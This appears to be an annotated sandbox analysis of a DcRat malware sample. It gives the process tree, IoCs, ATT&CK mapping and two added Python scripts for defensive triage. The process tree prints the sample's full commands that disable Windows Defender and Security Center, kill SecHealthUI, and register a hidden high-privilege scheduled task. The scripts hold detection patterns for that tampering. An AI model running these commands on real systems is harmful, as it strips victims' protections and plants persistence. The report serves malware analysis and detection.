Analysis
max time kernel: 149s
max time network: 146s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 14-05-2024 11:55
Static task: static1
Behavioral task: behavioral1
  Sample: c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe
  Resource: win7-20240508-en
Behavioral task: behavioral2
  Sample: c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe
  Resource: win10v2004-20240508-en

The signatures, process tree and dropped files below are from behavioral1 (Windows 7 x64, see the platform field above); the behavioral2 (Windows 10) run is not reproduced on this page.
General
Target: c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe
Size: 2.4MB
MD5: c564138a5dfe37ca9392c0ed3722bb10
SHA1: b859f2931678370ec7323284c48ee84420403dc6
SHA256: f4abbf4717010d698712c6f85944d73755d0fc30a60844fc6d0c9d86822cca38
SHA512: d0f92d165a455d838e9ffe83d4b8d5843ef65315ff2fe151bfebe6a09d1c8b8be842c797000fc46238a37f76b137bd6d491a84b7cd84e2412d96337cab9a6deb
SSDEEP: 24576:XF/Qs4a9rtQ/D5ey/A5m27P8fIeWRvtuEpjgbnvPQN5vYB9n5g9U0MOMJwPQ+3oS:XF6KNjgZwQ+33e76
Malware Config
Signatures
DcRat
DarkCrystal (DC) is a .NET RAT, first seen in June 2019, capable of loading additional plugins.

Modifies security service (2 TTPs, 3 IoCs)
  Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4"  (powershell.exe)
  Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4"  (powershell.exe)
  Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4"  (powershell.exe)
  The three writes come from three separate powershell.exe processes (PIDs 3000, 1760 and 1640 in the process tree), one per round of the tamper sequence. Start = 4 is SERVICE_DISABLED; wscsvc is the Security Center service, so after a reboot Windows stops reporting antivirus status. The sandbox records the raw hive path (ControlSet001) although the command targeted HKLM:\SYSTEM\CurrentControlSet, which is a link to the active control set.
YARA match (rule dcrat) in a memory dump of PID 2908 (UpdateWeb2View.exe):
  behavioral1/memory/2908-55-0x0000000005060000-0x00000000050C6000-memory.dmp
Executes dropped EXE (2 IoCs)
  PID 2908  UpdateWeb2View.exe
  PID 2204  NetTraceAgent.exe
Loads dropped DLL (2 IoCs)
  PID 2868  cmd.exe
  PID 2232  cmd.exe
Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\WBEMAgent = "C:\\Users\\Admin\\AppData\\Roaming\\WBEM\\wbemagents.exe"  (UpdateWeb2View.exe)
  A RunOnce value is deleted by the shell when it fires, so on its own it buys exactly one relaunch at the next logon; durable persistence in this sample is the NetTraceInfoTask scheduled task registered from the process tree below.
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 4  ipinfo.io
  flow 5  ipinfo.io
Drops file in Program Files directory (2 IoCs)
  File created                 C:\Program Files\Internet Explorer\ieupdates.exe  (UpdateWeb2View.exe)
  File opened for modification C:\Program Files\Internet Explorer\ieupdates.exe  (UpdateWeb2View.exe)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Kills process with taskkill (2 IoCs)
  PID 2748  taskkill.exe
  PID 2880  taskkill.exe
Modifies system certificate store (2 IoCs)
  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8  (UpdateWeb2View.exe)
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [certificate blob not reproduced on this page]  (UpdateWeb2View.exe)
  Check the thumbprint before treating this as a rogue root: CABD2A79A1076A31F21D253635CB039D4329A5E8 is the published SHA-1 fingerprint of ISRG Root X1 (the Let's Encrypt root). Windows 7 does not ship it, and CryptoAPI's automatic root update writes missing trusted roots into exactly this key the first time a chain needs them, so a TLS connection from PID 2908 (for example the ipinfo.io lookup) produces this entry without the sample installing a certificate of its own.
Suspicious behavior: EnumeratesProcesses (62 IoCs)
  powershell.exe PIDs (47 entries, in recorded order): 2376, 2956, 2528, 2896, 1736, 1052, 1088, 1192, 1432, 1112, 448, 1508, 2432, 3000, 1920, 2164, 2364, 2956, 2172, 1032, 324, 1256, 2444, 1684, 536, 1844, 1292, 1760, 692, 2068, 2860, 2924, 1124, 2932, 1968, 1548, 764, 2828, 652, 528, 1140, 1640, 900, 872, 2872, 1528, 1244
  UpdateWeb2View.exe PID 2908 (15 entries)
  PID 2956 appears twice because the PID was reused: once for the depth-3 "Set-MpPreference -MAPSReporting Disabled" process and once for a depth-4 "-DisableArchiveScanning" process (see the process tree).
Suspicious use of AdjustPrivilegeToken (50 IoCs)
  Token: SeDebugPrivilege, enabled by:
  powershell.exe PIDs (47): 2376, 2956, 2528, 2896, 1736, 1052, 1088, 1192, 1432, 1112, 448, 1508, 2432, 3000, 1920, 2164, 2364, 2956, 2172, 1032, 324, 1256, 2444, 1684, 536, 1844, 1292, 1760, 692, 2068, 2860, 2924, 1124, 2932, 1968, 1548, 764, 2828, 652, 528, 1140, 1640, 900, 872, 2872, 1528, 1244
  taskkill.exe PIDs (2): 2748, 2880
  UpdateWeb2View.exe PID (1): 2908
Suspicious use of WriteProcessMemory (64 IoCs)
  source PID (image) -> target PID (image): number of writes
  1492 (c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe) -> 2408 (cmd.exe): 4
  2408 (cmd.exe) -> 2376 (powershell.exe): 4
  1492 (c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe) -> 3004 (cmd.exe): 4
  3004 (cmd.exe) -> 2956 (powershell.exe): 4
  1492 (c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe) -> 2812 (cmd.exe): 4
  2812 (cmd.exe) -> 2748 (taskkill.exe): 4
  1492 (c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe) -> 2652 (cmd.exe): 4
  2652 (cmd.exe) -> 2528 (powershell.exe): 4
  1492 (c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe) -> 2600 (cmd.exe): 4
  2600 (cmd.exe) -> 2880 (taskkill.exe): 4
  1492 (c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe) -> 1676 (cmd.exe): 4
  1676 (cmd.exe) -> 2896 (powershell.exe): 4
  1492 (c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe) -> 2868 (cmd.exe): 4
  2868 (cmd.exe) -> 2908 (UpdateWeb2View.exe): 7
  1492 (c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe) -> 2368 (cmd.exe): 4
  1492 (c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe) -> 2232 (cmd.exe): 1 (the list stops at the 64-entry cap)
  Every pair here is a parent writing into a child it has just created, which is what CreateProcess does on a WoW64 system; this signature documents the spawn chain, not code injection into an unrelated process.
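The registry IoCs listed under "Modifies security service", "Adds Run key to start application" and "Modifies system certificate store" are emitted by the sandbox in one line format. The script below is an added example, not code from the sandbox or from the sample: it parses that line format into structured events and maps each to the ATT&CK technique it evidences. The event lines are constructed from the three IoCs above, the service list and the technique mapping are assumptions chosen for this report (the T1553.004 rule in particular needs the human check described above, since an auto-installed public root trips it just as a rogue one would).

```python
"""Parse sandbox registry IoC lines into structured events and map each to the
ATT&CK technique it evidences. Added example, not part of the report; the event
lines are constructed from the report, the mapping is an assumption (v15 IDs)."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed from the three registry IoCs in the Signatures section, in the
# sandbox's own "<op> <path>[ = "<value>"] <process>" line format.
EVENTS: List[str] = [
    r'Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4" powershell.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000'
    r'\Software\Microsoft\Windows\CurrentVersion\RunOnce\WBEMAgent'
    r' = "C:\\Users\\Admin\\AppData\\Roaming\\WBEM\\wbemagents.exe" UpdateWeb2View.exe',
    r'Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates'
    r'\CABD2A79A1076A31F21D253635CB039D4329A5E8 UpdateWeb2View.exe',
]

LINE = re.compile(
    r'^(?P<op>Set value \((?P<vtype>\w+)\)|Key created) '
    r'(?P<path>\\REGISTRY\\\S+?)'       # hive path, no spaces
    r'(?: = "(?P<value>.*)")?'          # value is absent for "Key created"
    r' (?P<proc>\S+\.exe)$'             # writing process
)

# Assumption: services whose Start=4 (SERVICE_DISABLED) neuters Defender or
# Security Center; wscsvc is the one this sample actually reached.
SECURITY_SERVICES = {"wscsvc", "securityhealthservice", "windefend", "wdnissvc", "sense"}


def parse(line: str) -> Optional[Dict[str, Optional[str]]]:
    """One sandbox registry IoC line -> dict of its fields, or None if it is not one."""
    m = LINE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["op"] = "create" if d["op"] == "Key created" else "set"
    return d


def technique(ev: Dict[str, Optional[str]]) -> Optional[Tuple[str, str]]:
    """(ATT&CK id, explanation) for an event, or None when no rule applies."""
    path = ev["path"] or ""
    low = path.lower()
    name = path.rsplit("\\", 1)[-1]       # last path component, original case
    m = re.search(r"\\services\\([^\\]+)\\start$", low)
    if m and ev["value"] == "4" and m.group(1) in SECURITY_SERVICES:
        return ("T1562.001", f"service {m.group(1)} set to Start=4 (disabled)")
    if "\\currentversion\\runonce\\" in low or "\\currentversion\\run\\" in low:
        return ("T1547.001", f"autostart value {name} -> {ev['value']}")
    if "\\systemcertificates\\root\\certificates\\" in low:
        # Verify the thumbprint against public roots before acting on this hit.
        return ("T1553.004", f"root store entry {name} {ev['op']}d")
    return None


def summarize(lines: List[str]) -> List[Tuple[str, str, str]]:
    """(process, technique id, explanation) for every parsable, mapped line."""
    out: List[Tuple[str, str, str]] = []
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        hit = technique(ev)
        if hit:
            out.append((ev["proc"] or "", hit[0], hit[1]))
    return out


if __name__ == "__main__":
    for proc, tid, why in summarize(EVENTS):
        print(f"{tid}  {proc:<20} {why}")
```

Run as a script it prints one line per mapped event; the rule for the ROOT store fires on thumbprint-agnostic key creation, so the thumbprint lookup against known public CAs is a manual step that belongs before escalation.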
Processes
Indentation shows depth in the tree. "cmd:" is the recorded command line; the bullet lines are the behaviors the sandbox attached to that process. The sample is a 32-bit image, so every child it starts through C:\Windows\system32\... resolves to the SysWOW64 copy via WoW64 file-system redirection. Note for this Windows 7 image: the Defender PowerShell module (Set-MpPreference) and SecHealthUI.exe do not exist on Windows 7, so those steps can only have had an effect in the Windows 10 (behavioral2) run; the New-ItemProperty registry writes do apply here, which is where the "Modifies security service" IoCs come from.

PID 1492  C:\Users\Admin\AppData\Local\Temp\c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe
  cmd: "C:\Users\Admin\AppData\Local\Temp\c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe"
  - Suspicious use of WriteProcessMemory

    PID 2408  C:\Windows\SysWOW64\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -MAPSReporting 0 >nul
      - Suspicious use of WriteProcessMemory

        PID 2376  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmd: powershell Set-MpPreference -MAPSReporting 0
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    PID 3004  C:\Windows\SysWOW64\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -MAPSReporting Disabled >nul
      - Suspicious use of WriteProcessMemory

        PID 2956  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmd: powershell Set-MpPreference -MAPSReporting Disabled
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    PID 2812  C:\Windows\SysWOW64\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c taskkill /f /im SecHealthUI.exe >nul 2>nul
      - Suspicious use of WriteProcessMemory

        PID 2748  C:\Windows\SysWOW64\taskkill.exe
          cmd: taskkill /f /im SecHealthUI.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    PID 2652  C:\Windows\SysWOW64\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -UiLockDown 1 >nul 2>nul
      - Suspicious use of WriteProcessMemory

        PID 2528  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmd: powershell Set-MpPreference -UiLockDown 1
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    PID 2600  C:\Windows\SysWOW64\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c taskkill /f /im SecHealthUI.exe >nul 2>nul
      - Suspicious use of WriteProcessMemory

        PID 2880  C:\Windows\SysWOW64\taskkill.exe
          cmd: taskkill /f /im SecHealthUI.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    PID 1676  C:\Windows\SysWOW64\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -SubmitSamplesConsent 0 >nul
      - Suspicious use of WriteProcessMemory

        PID 2896  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmd: powershell Set-MpPreference -SubmitSamplesConsent 0
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    PID 2868  C:\Windows\SysWOW64\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c start "" "C:\ProgramData\Microsoft\Windows\Caches\UpdateWeb2View.exe" >nul
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

        PID 2908  C:\ProgramData\Microsoft\Windows\Caches\UpdateWeb2View.exe
          cmd: "C:\ProgramData\Microsoft\Windows\Caches\UpdateWeb2View.exe"
          - Executes dropped EXE
          - Adds Run key to start application
          - Drops file in Program Files directory
          - Modifies system certificate store
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
    PID 2368  C:\Windows\SysWOW64\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c echo >nul

    PID 2232  C:\Windows\SysWOW64\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c start /b "" "C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe" >nul
      - Loads dropped DLL

        PID 2204  C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe
          cmd: "C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe"
          - Executes dropped EXE

          NetTraceAgent.exe runs the same 14-command sequence three times in a row; the PIDs are listed per round. Every child is C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, started as "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" followed by the arguments shown, and every child carries the tags "Suspicious behavior: EnumeratesProcesses" and "Suspicious use of AdjustPrivilegeToken"; the wscsvc entries additionally carry "Modifies security service". Two points a reader should not miss: -DisableRealtimeMnitoring is misspelled exactly as recorded, and since Set-MpPreference has no parameter of that name PowerShell rejects the call, so that step never disables real-time monitoring on any Windows version; and the ScheduledTasks module (Register-ScheduledTask) is absent on Windows 7, as is the SecurityHealthService key, so on this image only the wscsvc write and the RunOnce value took effect, which matches the IoC list. On Windows 10 the task would run NetTraceAgent.exe at startup and at logon with -RunLevel Highest, under a task path (\Microsoft\Windows\NetTrace) chosen to blend in with built-in tasks.

          Round 1 (depth 4):
            PID 1052  Set-MpPreference -MAPSReporting 0
            PID 1088  Set-MpPreference -MAPSReporting Disabled
            PID 1192  Set-MpPreference -SubmitSamplesConsent 0
            PID 1432  Set-MpPreference -DisableRealtimeMnitoring $true
            PID 1112  Set-MpPreference -UILockdown $true
            PID 448   "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force"
            PID 1508  "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableRealtimeMonitoring -Value 1 -PropertyType DWORD -Force"
            PID 2432  "New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\SecurityHealthService' -Name Start -Value 4 -PropertyType DWORD -Force"
            PID 3000  "New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\wscsvc' -Name Start -Value 4 -PropertyType DWORD -Force"   (Modifies security service)
            PID 1920  "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableBehaviorMonitoring -Value 1 -PropertyType DWORD -Force"
            PID 2164  "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableOnAccessProtection -Value 1 -PropertyType DWORD -Force"
            PID 2364  "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableScanOnRealtimeEnable -Value 1 -PropertyType DWORD -Force"
            PID 2956  Set-MpPreference -DisableArchiveScanning $True
            PID 2172  "$action=New-ScheduledTaskAction -Execute 'C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe'; $trigger = @(New-ScheduledTaskTrigger -AtStartup; New-ScheduledTaskTrigger -AtLogon); $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -DisallowHardTerminate -ExecutionTimeLimit ([TimeSpan]::FromDays(999)); Register-ScheduledTask -TaskName 'NetTraceInfoTask' -taskPath '\Microsoft\Windows\NetTrace' -Action $action -Trigger $trigger -Settings $settings -RunLevel Highest -Description 'Task that checks the NET connection trace.';"

          Round 2 (depth 4, same commands in the same order):
            PID 1032  Set-MpPreference -MAPSReporting 0
            PID 324   Set-MpPreference -MAPSReporting Disabled
            PID 1256  Set-MpPreference -SubmitSamplesConsent 0
            PID 2444  Set-MpPreference -DisableRealtimeMnitoring $true
            PID 1684  Set-MpPreference -UILockdown $true
            PID 536   New-ItemProperty ... DisableAntiSpyware (as in round 1)
            PID 1844  New-ItemProperty ... DisableRealtimeMonitoring (as in round 1)
            PID 1292  New-ItemProperty ... Services\SecurityHealthService Start=4 (as in round 1)
            PID 1760  New-ItemProperty ... Services\wscsvc Start=4 (as in round 1)   (Modifies security service)
            PID 692   New-ItemProperty ... Real-Time Protection\DisableBehaviorMonitoring (as in round 1)
            PID 2068  New-ItemProperty ... Real-Time Protection\DisableOnAccessProtection (as in round 1)
            PID 2860  New-ItemProperty ... Real-Time Protection\DisableScanOnRealtimeEnable (as in round 1)
            PID 2924  Set-MpPreference -DisableArchiveScanning $True
            PID 1124  Register-ScheduledTask 'NetTraceInfoTask' one-liner (identical to round 1)

          Round 3 (depth 4, same commands in the same order):
            PID 2932  Set-MpPreference -MAPSReporting 0
            PID 1968  Set-MpPreference -MAPSReporting Disabled
            PID 1548  Set-MpPreference -SubmitSamplesConsent 0
            PID 764   Set-MpPreference -DisableRealtimeMnitoring $true
            PID 2828  Set-MpPreference -UILockdown $true
            PID 652   New-ItemProperty ... DisableAntiSpyware (as in round 1)
            PID 528   New-ItemProperty ... DisableRealtimeMonitoring (as in round 1)
            PID 1140  New-ItemProperty ... Services\SecurityHealthService Start=4 (as in round 1)
            PID 1640  New-ItemProperty ... Services\wscsvc Start=4 (as in round 1)   (Modifies security service)
            PID 900   New-ItemProperty ... Real-Time Protection\DisableBehaviorMonitoring (as in round 1)
            PID 872   New-ItemProperty ... Real-Time Protection\DisableOnAccessProtection (as in round 1)
            PID 2872  New-ItemProperty ... Real-Time Protection\DisableScanOnRealtimeEnable (as in round 1)
            PID 1528  Set-MpPreference -DisableArchiveScanning $True
            PID 1244  Register-ScheduledTask 'NetTraceInfoTask' one-liner (identical to round 1)

    PID 1724  C:\Windows\SysWOW64\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c powershell.exe "$action=New-ScheduledTaskAction -Execute 'C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe'; $trigger = @(New-ScheduledTaskTrigger -AtStartup; New-ScheduledTaskTrigger -AtLogon); $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -DisallowHardTerminate -ExecutionTimeLimit ([TimeSpan]::FromDays(999)); Register-ScheduledTask -TaskName 'NetTraceInfoTask' -taskPath '\Microsoft\Windows\NetTrace' -Action $action -Trigger $trigger -Settings $settings -RunLevel Highest -Description 'Task that checks the NET connection trace.';" >nul

        PID 1736  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmd: powershell.exe "$action=New-ScheduledTaskAction -Execute 'C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe'; $trigger = @(New-ScheduledTaskTrigger -AtStartup; New-ScheduledTaskTrigger -AtLogon); $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -DisallowHardTerminate -ExecutionTimeLimit ([TimeSpan]::FromDays(999)); Register-ScheduledTask -TaskName 'NetTraceInfoTask' -taskPath '\Microsoft\Windows\NetTrace' -Action $action -Trigger $trigger -Settings $settings -RunLevel Highest -Description 'Task that checks the NET connection trace.';"
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
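A triage pass over the command lines in the tree above, as an added example that is not code from the sandbox or from the sample. The records are a constructed subset of the tree with the same PIDs and command lines; the rule set, the tag names and the list of known Set-MpPreference parameters are assumptions kept deliberately small. The point it makes: a detection should fire on the lineage (Temp-directory executable > cmd.exe > powershell.exe Set-MpPreference, or NetTraceAgent.exe in ProgramData spawning the Defender-policy writes) rather than on powershell.exe alone, and a triage script can surface the misspelled -DisableRealtimeMnitoring parameter that makes one of the tamper steps a no-op.

```python
"""Triage of a sandbox process tree: tag Defender / Security Center tampering and
show each hit with its full parent chain. Added example, not code from the
sandbox or the sample; rules and the known-parameter list are assumptions."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Proc:
    pid: int
    parent: Optional[int]  # None for the root of the tree
    image: str
    cmdline: str


SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
AGENT = r"C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe"

# Constructed subset of the report's process tree (same PIDs and command lines;
# the scheduled-task one-liner is abridged to the cmdlets that matter here).
RECORDS: List[Proc] = [
    Proc(1492, None, "c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe", f'"{SAMPLE}"'),
    Proc(2408, 1492, "cmd.exe", r"C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -MAPSReporting 0 >nul"),
    Proc(2376, 2408, "powershell.exe", "powershell Set-MpPreference -MAPSReporting 0"),
    Proc(2812, 1492, "cmd.exe", r"C:\Windows\system32\cmd.exe /c taskkill /f /im SecHealthUI.exe >nul 2>nul"),
    Proc(2748, 2812, "taskkill.exe", "taskkill /f /im SecHealthUI.exe"),
    Proc(2232, 1492, "cmd.exe", rf'C:\Windows\system32\cmd.exe /c start /b "" "{AGENT}" >nul'),
    Proc(2204, 2232, "NetTraceAgent.exe", f'"{AGENT}"'),
    Proc(1432, 2204, "powershell.exe", f'"{PS}" Set-MpPreference -DisableRealtimeMnitoring $true'),
    Proc(3000, 2204, "powershell.exe",
         f'"{PS}" "New-ItemProperty -Path \'HKLM:\\SYSTEM\\CurrentControlSet\\Services\\wscsvc\' '
         "-Name Start -Value 4 -PropertyType DWORD -Force\""),
    Proc(2172, 2204, "powershell.exe",
         f'"{PS}" "$action=New-ScheduledTaskAction -Execute \'{AGENT}\'; '
         "Register-ScheduledTask -TaskName 'NetTraceInfoTask' -taskPath '\\Microsoft\\Windows\\NetTrace' "
         '-Action $action -RunLevel Highest"'),
]

# Assumption: a small starting rule set; the names are the tags this script emits.
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("defender_prefs_tamper", re.compile(r"Set-MpPreference\s+-\w+", re.I)),
    ("defender_policy_tamper", re.compile(r"Policies\\Microsoft\\Windows Defender", re.I)),
    ("security_service_disabled",
     re.compile(r"Services\\(wscsvc|SecurityHealthService)'\s+-Name\s+Start\s+-Value\s+4", re.I)),
    ("kills_security_ui", re.compile(r"\btaskkill\b.*\s/im\s+SecHealthUI\.exe", re.I)),
    ("scheduled_task_highest", re.compile(r"Register-ScheduledTask\b.*-RunLevel\s+Highest", re.I)),
    ("exec_from_programdata", re.compile(r"C:\\ProgramData\\[^\"']*\.exe", re.I)),
]

# Assumption: partial list of real Set-MpPreference parameter names (lower-cased),
# enough to cover what this sample uses.
MP_KNOWN_PARAMS = {"mapsreporting", "submitsamplesconsent", "disablerealtimemonitoring",
                   "uilockdown", "disablearchivescanning", "disablebehaviormonitoring"}


def classify(cmdline: str) -> List[str]:
    """Tags whose pattern matches the command line, sorted for stable output."""
    return sorted(name for name, rx in RULES if rx.search(cmdline))


def unknown_mp_params(cmdline: str) -> List[str]:
    """Parameters passed to Set-MpPreference that are not real parameter names.
    PowerShell rejects the whole call on an unknown name, so such a step is a
    no-op (the report's -DisableRealtimeMnitoring is one)."""
    idx = cmdline.lower().find("set-mppreference")
    if idx < 0:
        return []
    tail = cmdline[idx + len("Set-MpPreference"):]
    return [p for p in re.findall(r"\s-([A-Za-z]\w*)", tail) if p.lower() not in MP_KNOWN_PARAMS]


def lineage(index: Dict[int, Proc], pid: int) -> List[str]:
    """Image names from the root of the tree down to pid."""
    chain: List[str] = []
    cur: Optional[int] = pid
    while cur is not None and cur in index:
        chain.append(index[cur].image)
        cur = index[cur].parent
    return chain[::-1]


def triage(records: List[Proc]) -> List[Tuple[int, str, List[str]]]:
    """(pid, 'root > ... > image', tags) for every process with at least one tag."""
    index = {r.pid: r for r in records}
    findings: List[Tuple[int, str, List[str]]] = []
    for r in records:
        tags = classify(r.cmdline)
        typos = unknown_mp_params(r.cmdline)
        if typos:
            tags.append("mp_param_typo:" + ",".join(typos))
        if tags:
            findings.append((r.pid, " > ".join(lineage(index, r.pid)), tags))
    return findings


if __name__ == "__main__":
    for pid, chain, tags in triage(RECORDS):
        print(f"{pid:>5}  {chain}\n       {', '.join(tags)}")
```

The lineage string is what turns a noisy "powershell.exe ran Set-MpPreference" alert into a specific one: an administrator's console session and a Temp-directory binary driving cmd.exe both produce the same child command line, and only the chain tells them apart.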
Network
No connection table is reproduced on this page; the only recorded network indicators are flows 4 and 5 to ipinfo.io, listed under Signatures.

MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1): Windows Service (1)
Privilege Escalation
  Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1): Windows Service (1)

The automatic mapping covers only the RunOnce value and the wscsvc service change. Not mapped by the sandbox but evident in the process tree: Impair Defenses: Disable or Modify Tools (T1562.001) for the Set-MpPreference calls, the Windows Defender policy values and the taskkill of SecHealthUI.exe, and Scheduled Task (T1053.005) for the NetTraceInfoTask registration.
Downloads
Files written during the run, as listed by the sandbox. The page gives no path for the first and last entries, so they cannot be tied to UpdateWeb2View.exe or NetTraceAgent.exe from this report alone.

(no path recorded)
  Filesize: 208KB
  MD5: a58599f667d687f6eb51bb528a6bb528
  SHA1: 0991f92dc45d82227775f9968d91dcbe703d03a2
  SHA256: b93b33fff6d41f5c0388ec4a1e424db2a304582e998596810f47b9b823ef2807
  SHA512: 2dd48e6042a65c0d7f1af17676ef3cc35dbdf5978c68ca00a1b6e228146bec306411e38e4bbffaf0de172dd7cbdd2993e9cb5c645d4251d420acb0501d39d0b1

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
(Windows jump-list file maintained by the shell as programs are launched; three successive versions were captured. Triage noise, not a dropped payload.)
  Filesize: 7KB
  MD5: 7d8e619d3274bfe2726aa61e1e22b904
  SHA1: 33d3efd6333f0999a141a35c419a94b99b18eb91
  SHA256: 023bcc0e267bdd7148758f7eb15b32002beaae1d19e2a6a666679b214317dcea
  SHA512: 726beca385b989a754beabe0c84ed7d2f5df1e4a783da83424db99b6daf73659e91d1e07286d88e90e1cdf8d9a6bddcbfcb60a46a9e748cfec778319e21f1e03

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: 8dff18646bd564e8ca6c671b5876cc30
  SHA1: 7fd2c63047ab11eb177a49412d134957cc9aa8ae
  SHA256: 52494bf2f8f222ad90c89683db0d9f8d6bfddc349d44bfb7dc0c4d9ad253084e
  SHA512: 61c4428293ce0f85cefd640e535ca55b1ab41a44dd7c5e0df294b805308841ec28fa2d1cc0205d37f020d53b9d318be098d4042a77d6cfabd2fcdb558b7f21fe

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: 06c17315717ec95bd609351e3b0de88e
  SHA1: d4c5cb2d0887fa75b85893b5aba1ce82de071eb8
  SHA256: 9dcb3313a6132a0ad6737915ebfee89cac3faa12be942b8714c78f6d65146b95
